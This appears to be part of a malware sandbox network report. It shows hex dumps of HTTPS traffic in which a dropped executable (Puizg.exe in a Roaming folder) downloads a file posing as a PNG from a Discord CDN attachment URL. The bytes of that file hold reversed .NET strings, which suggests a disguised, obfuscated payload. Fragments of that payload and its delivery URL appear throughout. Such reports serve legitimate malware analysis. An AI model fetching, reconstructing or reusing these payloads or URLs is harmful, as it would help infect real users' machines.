                                                                                  Data Ascii: ,~ (~8:{8(~{8(=~48s(~(9~**8L+>(+0#8 &.:{,~ **8X*89O({3{"8(+~{3{Q8
                                                                                  2022-05-02 11:02:01 UTC1087INData Raw: 28 05 2b 00 00 00 00 00 00 00 fc 00 04 30 13 00 00 2a 04 00 05 aa 7e 68 6c ba 26 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 05 aa 7e 5d 47 35 d2 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 56 6d 72 29 28 05 2b 4a 00 00 2a 0a 00 02 3a 28 04 0e 05 04 03 02 26 00 00 00 0c 3a 25 06 00 16 4b 28 04 00 09 d7 7e 03 04 00 05 a9 7b 02 7a 0a 00 01 2b 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e8 7b 04 00 08 2c 7e 61 1f db 54 1d 20 61 4a 80 ca ed 20 74 d4 a2 38 20 00 00 00 2c 3a 04 00 05 a9 7b 02 41 01 33 4f 28 05 2b 00 00 00 00 00 00 00 62 00 06 30 03 ff ff ff c0 38 04 00 05 a9 7d 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e5 7b 04 00 08 2c 7e 61 d8 85 1f 1c 20 63 00 00 00 04 20 a8 6d bc 35 20 26 00 00 00 2d 3a 25 03 02 2a 00 00 00 01 38 39 18 0a
                                                                                  Data Ascii: (+0*~hl&(+6*~]G5(+B*(9~Vmr)(+J*:(&:%K(~{z+s(&~a{,~aT aJ t8 ,:{A3O(+b08}zs(&~a{,~a c m5 &-:%*89
                                                                                  2022-05-02 11:02:01 UTC1103INData Raw: 38 ff ff ff b6 3a 02 00 00 00 17 38 02 13 0a 00 00 6c 73 7a 0a 00 01 2b 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 0a 7b 04 00 08 2c 7e 61 d4 70 5e df 20 cb 04 e0 6c 20 ff ff ff b6 38 00 13 06 00 15 83 28 04 00 09 a5 7e 02 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 17 7b 04 00 08 2c 7e 61 a1 bc 88 22 20 cb 04 e0 6c 20 00 00 00 75 38 01 13 06 00 15 87 28 04 00 09 a6 7e 02 00 00 00 7c 38 56 78 c0 fd 28 05 2b 11 00 00 d5 00 00 01 01 00 06 30 1b 00 2a 7a 06 00 05 ce 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e5 7b 04 00 08 2c 7e 61 f6 5c f6 92 20 65 2b a0 d5 01 20 ff ff ff e0 38 ff ff ff d5 39 04 00 05 78 7b 02 ff ff ff b9 38 00 00 00 3c 39 04 00 05 76 7b 02 00 00 00 20 38 00 00 00 4c 39 04 00 05 73 7b 02 7a 06 00 05 ce 73 06 00 13 87 28
                                                                                  Data Ascii: 8:8lsz+s(&~a{,~ap^ l 8(~zs(&~a{,~a" l u8(~|8Vx(+0*zs(&~a{,~a\ e+ 89x{8<9v{ 8L9s{zs(
                                                                                  2022-05-02 11:02:01 UTC1119INData Raw: f3 38 04 00 05 55 7d 03 02 2a 00 00 00 01 38 69 6c d9 77 28 05 2b 66 00 2a 04 00 05 55 7b 02 50 7f 94 4b 28 05 2b 3a 2a 06 00 14 b3 28 04 00 09 71 7e 14 14 06 00 14 af 28 04 00 09 70 7e 02 36 04 63 87 28 05 2b 7e 00 2a 04 00 05 54 7b 02 61 0f 66 6f 28 05 2b 3a 00 2a 04 00 05 53 7b 02 34 20 b6 bc 28 05 2b 3a 00 ff ff ff 94 38 04 00 05 54 7d 04 02 ff ff ff 4a 38 ff ff ff 95 3d 16 03 00 00 00 0c 38 04 00 05 53 7d 03 02 7a 0a 00 02 03 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 2d 7b 04 00 08 2c 7e 61 b9 ba 1c 78 20 66 30 dd 6b 73 20 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 24 7b 04 00 08 2c 7e 61 05 6c 49 69 20 00 18 53 0e 20 2a 00 00 00 01 38 00 00 00 4d 39 0a 00 00 8b 28 04 7a 0a 00 02 02 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 d5 7b 04 00 08 2c 7e
                                                                                  Data Ascii: 8U}*8ilw(+f*U{PK(+:*(q~(p~6c(+~*T{afo(+:*S{4 (+:8T}J8=8S}zs(&~a-{,~ax f0ks (&~a${,~alIi S *8M9(zs(&~a{,~
                                                                                  2022-05-02 11:02:01 UTC1135INData Raw: d3 28 04 00 08 39 7e 68 74 0f e2 28 05 2b 4a 00 2a 00 00 00 00 38 0a 00 01 8a 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 5d 3b 23 7c 28 05 2b 8a 00 00 2a 04 00 04 a6 7e 2e 4a 78 71 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 04 a6 7e 3c 29 c7 f7 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 2f 0b 2b 43 28 05 2b 4a 00 2a 00 00 00 00 38 0a 00 01 8a 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 46 26 05 83 28 05 2b 8a 00 00 2a 04 00 04 a5 7e 4a 4e c5 13 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 04 a5 7e 4f 57 e1 6b 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 33 6c ad 72 28 05 2b 4a 00 2a 00 00 00 00 38 0a 00 01 8a 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 3f 7d db 6d 28 05 2b 8a 00 00 2a 04 00 04 a4 7e 30 2d c0 28 28 05 2b 36 00 00 00 2a
                                                                                  Data Ascii: (9~ht(+J*8(8(:~];#|(+*~.Jxq(+6*~<)(+B*(9~/+C(+J*8(8(:~F&(+*~JN(+6*~OWk(+B*(9~3lr(+J*8(8(:~?}m(+*~0-((+6*
                                                                                  2022-05-02 11:02:01 UTC1151INData Raw: 12 0a 00 00 23 28 06 00 0c bf 28 02 00 00 a7 20 06 00 10 0f 28 04 00 08 48 7e fd 36 77 9b 20 06 00 10 0f 28 04 00 08 48 7e fd 36 77 df 20 2a 02 11 00 00 00 00 38 02 13 01 11 00 00 00 0c 38 00 13 01 00 00 16 8d 16 11 00 00 84 00 00 00 60 00 08 30 13 00 00 2a 02 11 ff ff ff 9f 38 00 13 a2 03 17 25 a2 01 00 00 3d 8c 02 16 25 01 00 00 16 8d 18 ff ff ff b0 38 01 13 01 00 00 22 a5 06 00 11 9b 28 04 00 08 ab 7e 17 16 00 12 06 00 04 2e 28 06 00 0c bf 28 02 00 00 bf 20 06 00 10 0f 28 04 00 08 48 7e fd 36 77 b0 20 06 00 10 0f 28 04 00 08 48 7e fd 36 77 df 20 00 00 00 61 38 02 13 01 11 00 00 00 50 38 11 00 00 88 00 00 00 72 00 08 30 13 00 00 ff ff ff f4 38 02 13 01 11 2a 02 11 ff ff ff a3 38 00 13 a2 01 00 00 22 8c 02 16 25 01 00 00 16 8d 17 00 00 00 19 38 01 13 01
                                                                                  Data Ascii: #(( (H~6w (H~6w *88`0*8%=%8"(~.(( (H~6w (H~6w a8P8r08*8"%8
                                                                                  2022-05-02 11:02:01 UTC1167INData Raw: 0f ff ff ff 24 38 26 0a 00 01 56 28 0a 00 01 4b 28 58 6a 14 1f 58 6a 05 11 0a 00 01 10 28 00 0f 00 00 00 78 38 10 13 0a 00 01 54 28 0a 00 01 4b 28 58 6a 5a 59 06 11 0f 11 1a 58 6a 0a 11 0a 00 01 10 28 00 0f ff ff ff 39 38 0c 13 01 fe 00 00 01 0b 20 08 11 ff ff fe 82 38 ff ff fe 22 38 00 00 00 e7 38 07 13 0a 00 01 54 28 0a 00 01 4b 28 58 6a 20 1f 58 6a 00 11 0a 00 01 10 28 00 0f 00 00 00 3a 38 0f 13 58 06 11 0a 00 01 56 28 0a 00 01 4b 28 58 6a 5a 18 02 11 58 6a 0b 11 0a 00 01 10 28 00 0f ff ff fe c9 38 26 26 0a 00 01 54 28 0a 00 01 4b 28 58 6a 07 11 0a 00 01 10 28 00 0f 0a 00 01 10 28 00 0f ff ff ff 71 38 03 13 58 6a 18 1f 58 6a 05 11 0a 00 01 10 28 00 0f ff ff fe 98 38 ff ff fe c9 38 00 00 01 8f 38 ff ff ff 19 3a 12 11 00 00 00 0c 38 15 13 58 6a 60 1f 03
                                                                                  Data Ascii: $8&V(K(XjXj(x8T(K(XjZYXj(98 8"88T(K(Xj Xj(:8XV(K(XjZXj(8&&T(K(Xj((q8XjXj(888:8Xj`
                                                                                  2022-05-02 11:02:01 UTC1183INData Raw: 25 a2 02 00 00 12 8c 02 00 00 12 71 04 18 25 a2 01 00 00 3d 8c 03 17 25 a2 01 00 00 22 8c 02 16 25 01 00 00 16 8d 1a 00 00 00 81 38 df 01 00 00 22 a5 9a 19 00 11 05 00 00 00 10 38 5a 09 56 c2 28 05 2b 11 00 00 56 00 00 00 a6 00 08 30 13 ff ff ff ab 38 26 06 00 11 9b 28 04 00 08 ab 7e 17 16 00 12 0a 00 00 23 28 06 00 0c bf 28 02 00 00 74 20 06 00 10 0f 28 04 00 08 48 7e fd 36 79 99 20 06 00 10 0f 28 04 00 08 48 7e fd 36 76 fa 20 ff ff ff eb 38 02 00 00 12 81 02 00 00 12 a5 9a 16 00 11 02 2a 00 00 00 15 38 00 13 a2 03 17 25 a2 02 00 00 12 8c 02 00 00 12 71 02 16 25 01 00 00 16 8d 18 37 2b 05 7c 28 05 2b 11 00 00 55 00 00 00 7c 00 08 30 13 00 2a 00 00 00 00 38 0a 00 00 11 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 67 67 57 a7 28 05 2b 8a 00 2a 0a 00
                                                                                  Data Ascii: %q%=%"%8"8ZV(+V08&(~#((t (H~6y (H~6v 8*8%q%7+|(+U|0*8(8(:~ggW(+*
                                                                                  2022-05-02 11:02:01 UTC1199INData Raw: 00 2a 04 00 03 24 7e 32 7a e4 3a 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 03 24 7e 68 57 bf fb 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 54 11 04 3e 28 05 2b 4a 00 2a 00 00 00 00 38 0a 00 00 11 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 50 6b 10 28 28 05 2b 8a 00 00 2a 04 00 03 1f 7e 6e 08 35 8e 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 03 1f 7e 50 64 cf 5a 28 05 2b 42 00 00 ff ff fe c1 38 04 00 03 1c 80 00 02 00 00 20 ff ff ff 08 38 04 00 03 10 80 00 00 20 00 20 ff ff fe c9 38 00 00 00 00 20 26 ff ff fe d4 3a 04 00 07 fa 7b 04 00 08 2c 7e 00 00 00 00 20 06 00 0f d3 28 04 00 08 39 7e 00 00 00 29 38 04 00 03 0f 80 00 00 10 00 20 ff ff ff 7c 38 04 00 03 19 80 00 00 40 00 20 00 00 00 56 38 04 00 03 1b 80 00 00 10 00 00 00 00 00 21 ff ff ff e2 38 04
                                                                                  Data Ascii: *$~2z:(+6*$~hW(+B*(9~T>(+J*8(8(:~Pk((+*~n5(+6*~PdZ(+B8 8 8 &:{,~ (9~)8 |8@ V8!8
                                                                                  2022-05-02 11:02:01 UTC1215INData Raw: 2b 70 01 28 05 2b 46 00 00 2a 0a 00 00 57 6f 00 00 09 fe 45 5c 82 f7 28 05 2b 46 00 2a 06 00 0f d3 28 04 00 08 39 7e 47 7f 4f 3f 28 05 2b 4a 01 00 00 16 00 00 00 0b 00 00 01 28 00 00 01 15 00 00 00 13 00 00 00 00 00 00 00 00 00 00 00 27 00 00 00 f7 00 00 00 cd 00 00 00 2a 00 00 00 02 01 00 00 16 00 00 00 0b 00 00 01 8c 00 00 00 50 00 00 01 3c 00 00 00 00 00 00 4c 41 ff ff ff 94 38 00 13 16 ff ff fe 70 38 ff ff fe 75 dd 00 00 00 00 38 26 ff ff fe 80 dd 00 00 00 00 38 ff ff ff b6 dd ff ff ff c7 38 05 13 04 11 00 00 00 09 38 00 13 17 00 00 00 08 38 26 06 00 10 33 28 04 00 08 51 7e 04 12 06 00 00 41 28 0a 00 00 4e 28 00 00 00 1c 38 00 00 00 3c 39 05 11 00 00 00 0c 38 04 13 16 00 2a 00 11 00 00 00 64 38 00 00 00 69 dd 00 00 00 00 38 26 00 00 00 74 dd 00 00 00
                                                                                  Data Ascii: +p(+F*WoE\(+F*(9~GO?(+J('*P<LA8p8u8&8888&3(Q~A(N(8<98*d8i8&t


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.449774162.159.130.233443C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2022-05-02 11:03:03 UTC1222OUTGET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1
                                                                                  Host: cdn.discordapp.com
                                                                                  Connection: Keep-Alive
                                                                                  2022-05-02 11:03:03 UTC1223INHTTP/1.1 200 OK
                                                                                  Date: Mon, 02 May 2022 11:03:03 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 1250816
                                                                                  Connection: close
                                                                                  CF-Ray: 705044a74d36918c-FRA
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 9885
                                                                                  Cache-Control: public, max-age=31536000
                                                                                  ETag: "8b4e3118a9ad10f525d58287a5b3d59e"
                                                                                  Expires: Tue, 02 May 2023 11:03:03 GMT
                                                                                  Last-Modified: Mon, 02 May 2022 07:20:29 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: HIT
                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  x-goog-generation: 1651476029852442
                                                                                  x-goog-hash: crc32c=hwhX1A==
                                                                                  x-goog-hash: md5=i04xGKmtEPUl1YKHpbPVng==
                                                                                  x-goog-metageneration: 1
                                                                                  x-goog-storage-class: STANDARD
                                                                                  x-goog-stored-content-encoding: identity
                                                                                  x-goog-stored-content-length: 1250816
                                                                                  X-GUploader-UploadID: ADPycdvlLx3JracfYsvVBAgmX4a-C82nsbcn_2Up0RFqabos6mHUOzxh5QL4HNlUSOsot6bjxrgVH3mfckuvec55iPKWOozK8RZR
                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7COyKoQPUkXKL6QK3nN2K%2BZOWULMmhalIsZU3MuyqhiXf%2BP%2F808sLTAk0c62uTZ0JdxFiZMJI67lQpl%2B4IuAhwkGklzEAd9xNb%2BOxp8O4Bjcd1zkHEOjFAVI8BJwndy30sEDPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  2022-05-02 11:03:03 UTC1224INData Raw: 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:03 UTC1224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:03 UTC1225INData Raw: 00 00 00 3f 1f dd 48 64 00 01 00 00 1f dd 48 64 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 42 00 00 00 00 00 00 00 00 00 00 03 42 00 13 40 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: ?HdHdOFNI_NOISREV_SV4BB@XH0
                                                                                  2022-05-02 11:03:03 UTC1227INData Raw: 00 00 00 02 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 13 00 00 00 01 05 61 33 61 30 35 64 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 51 00 00 00 02 0c 00 00 00 00 00 00 00 01 ff ff ff ff 00 00 00 01 00 43 0b 00 00 00 01 08 00 00 00 01 00 00 00 2d 0f 00 00 00 26 09 00 00 00 01 00 00 00 2c 11 74 74 20 6d 6d 3a 68 07 00 00 00 55 06 6d 6d 3a 48 04 00 00 00 54 06 74 74 20 6d 6d 3a 68 68 08 00 00 00 53 06 00 00 00 27 09 00 00 00 04 00 00 00 2b 11 00 00 00 23 09 00 00 00 01 00 00 00 2a 11 64 64 2d 4d 4d 2d 79 79 79 79 0a 00 00 00 50 06 00 00 00 24 09 00 00 00 02 00 00
                                                                                  Data Ascii: eziS.gniwarD.metsySa3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsySQC-&,tt mm:hUmm:HTtt mm:hhS'+#*dd-MM-yyyyP$
                                                                                  2022-05-02 11:03:03 UTC1228INData Raw: 64 61 65 52 73 69 5f 6d 0c 73 72 61 64 6e 65 6c 61 43 6c 61 6e 6f 69 74 70 6f 11 73 65 6d 61 4e 61 72 45 68 73 69 6c 67 6e 45 76 65 72 62 62 61 5f 6d 17 73 65 6d 61 4e 61 72 45 76 65 72 62 62 61 5f 6d 10 73 65 6d 61 4e 61 72 65 5f 6d 0a 73 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68 53 6c 6c 61 14 73 6e 72 65 74 74 61 50 65 74 61 44 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 74 61 44 74 72 6f 68 53 6c 6c 61 14 73 6e 72 65 74 74 61 50 68 74 6e 6f 4d 72 61 65 59 6c 6c 61 14 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68 73 10 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 6c 0f 6e 72 65 74 74 61 50 68 74 6e 6f 4d 72 61 65 79 10 6e 72 65 74 74 61 50 65 74 61 44 74 72 6f 68 73 10 6e 72 65 74 74 61
                                                                                  Data Ascii: daeRsi_msradnelaClanoitposemaNarEhsilgnEverbba_msemaNarEverbba_msemaNare_msnrettaPemiTgnoLllasnrettaPemiTtrohSllasnrettaPetaDgnoLllasnrettaPetaDtrohSllasnrettaPhtnoMraeYllanrettaPemiTtrohsnrettaPemiTgnolnrettaPhtnoMraeynrettaPetaDtrohsnretta
                                                                                  2022-05-02 11:03:03 UTC1229INData Raw: 65 72 72 75 63 0e 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 79 63 6e 65 72 72 75 63 18 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 16 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 72 65 62 6d 75 6e 14 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 72 65 62 6d 75 6e 16 6e 67 69 53 65 76 69 74 61 67 65 6e 0c 6e 67 69 53 65 76 69 74 69 73 6f 70 0c 73 65 7a 69 53 70 75 6f 72 47 74 6e 65 63 72 65 70 11 73 65 7a 69 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 12 73 65 7a 69 53 70 75 6f 72 47 72 65 62 6d 75 6e 10 00 00 00 22 6f 66 6e 49 74 61 6d 72 6f 46 72 65 62 6d 75 4e 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 25 00 00 00 04 04 00 00 00 7f 00 00 00 00 00 00 00 00 07 09 00 00 00 07 09 01 2c 01 00 00 00 08 06 08 01 08
                                                                                  Data Ascii: errucrotarapeSlamiceDycnerrucrotarapeSpuorGycnerrucrotarapeSpuorGrebmunrotarapeSlamiceDrebmunngiSevitagenngiSevitisopseziSpuorGtnecrepseziSpuorGycnerrucseziSpuorGrebmun"ofnItamroFrebmuN.noitazilabolG.metsyS%,
                                                                                  2022-05-02 11:03:03 UTC1231INData Raw: 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 00 00 00 00 00 00 00 00 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 01 00 01 02 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 00 01 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 02 01 00 01 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 02 01 00 01
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:03 UTC1232INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:03 UTC1233INData Raw: 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 20 2c 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 66 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 62 69 6c 72 6f 63 73 6d 20 2c 6f 66 6e 49 65 72 75 74 6c 75 43 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 6d 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43
                                                                                  Data Ascii: 11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsyS ,eziS.gniwarD.metsySf980e439165c5a77b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,bilrocsm ,ofnIerutluC.noitazilabolG.metsySm980e439165c5a77b=nekoTyeKcilbuP ,lartuen=erutluC
                                                                                  2022-05-02 11:03:03 UTC1235INData Raw: 73 e3 ca cc 98 b8 1a 00 c7 21 2e d6 23 0c 07 7f 88 61 48 c6 44 71 ce 3b 18 0e c3 41 bb 3d 9b 27 a9 92 5f ee d7 28 01 20 5d db 83 41 bb 31 99 00 6a 8a 48 9b 88 b1 bc 77 5b 74 9d 0b 7a 37 15 4c d1 71 97 48 e0 7e 42 58 dc 85 68 12 9b 86 ee 38 8f 08 38 30 c7 b1 55 1d 14 a0 69 0f 09 a0 d2 13 71 dc ee d2 91 74 bc d9 f2 6a be 8e 96 59 33 ed 38 3c 76 5f a8 b8 0b ca 5e 5f 1a e8 2c 6a 74 3f bf ac d6 bb 77 7d cb 66 47 7d 52 d4 37 7f 96 2c 39 cb ff d4 19 65 07 16 5e 4a df 74 09 40 d9 fd 6c d4 b3 f3 76 79 c4 38 f6 0d af e1 94 97 66 26 7b 99 5e 27 92 52 07 bc ef b9 2d 3d b6 1c 38 10 3a 55 7e b5 2d 97 93 d7 98 f1 42 b0 65 00 26 c7 f2 05 ba 96 b5 a0 fb 43 17 57 6e 7b 7b 93 97 44 60 8a cb 46 bb 39 9f 04 2f 14 f7 76 a5 c7 78 3f ca 43 98 77 c8 ca 0e 17 c6 49 6b 44 71 2d 96
                                                                                  Data Ascii: s!.#aHDq;A='_( ]A1jHw[tz7LqH~BXh880UiqtjY38<v_^_,jt?w}fG}R7,9e^Jt@lvy8f&{^'R-=8:U~-Be&CWn{{D`F9/vx?CwIkDq-
                                                                                  2022-05-02 11:03:03 UTC1236INData Raw: 1c 0f a9 ee be 92 5a 2f 07 c0 84 b7 47 82 f8 7d 01 aa 35 88 70 00 e3 e7 6c b6 ea 4f b2 06 ca 01 f1 c6 58 ad fa e1 7f a1 c5 bb 73 39 25 1c 89 64 ff b7 10 54 16 59 a2 8d 9c 34 94 e3 12 96 f3 a4 23 36 8e 29 24 b9 86 89 92 4b 50 b9 f3 67 59 70 1f 9f df 1f 37 95 c6 49 97 e5 fe 81 7d cd 9e aa 40 50 c9 31 c8 df e6 27 0c c2 7a 78 f0 92 4a ef 78 29 9b 4b af 16 e6 3e 9e ca 17 51 74 c0 2a e8 a5 6f 94 e6 aa da 14 1a fd fe a5 ec 1a f8 b1 96 31 98 72 60 2a 98 0a b3 2b e1 48 e5 7f a3 7a e0 ee 63 2d ec a0 08 cb 3d 59 3d aa 93 ee f5 fc e4 85 ce aa 1d 7f f0 7f 87 86 c1 c1 ab 5a 9f 41 06 d8 7b ad d8 e9 1f f5 bc ef 25 2b e4 ea 54 91 86 e9 45 d4 45 e8 87 17 8b 34 c5 18 1b b5 59 ae 78 41 f3 24 1f 52 fa 3c 28 65 6b b5 25 11 38 3f 05 e6 64 01 39 49 d6 d7 d9 6e 8e b3 9d 76 f4 82
                                                                                  Data Ascii: Z/G}5plOXs9%dTY4#6)$KPgYp7I}@P1'zxJx)K>Qt*o1r`*+Hzc-=Y=ZA{%+TEE4YxA$R<(ek%8?d9Inv
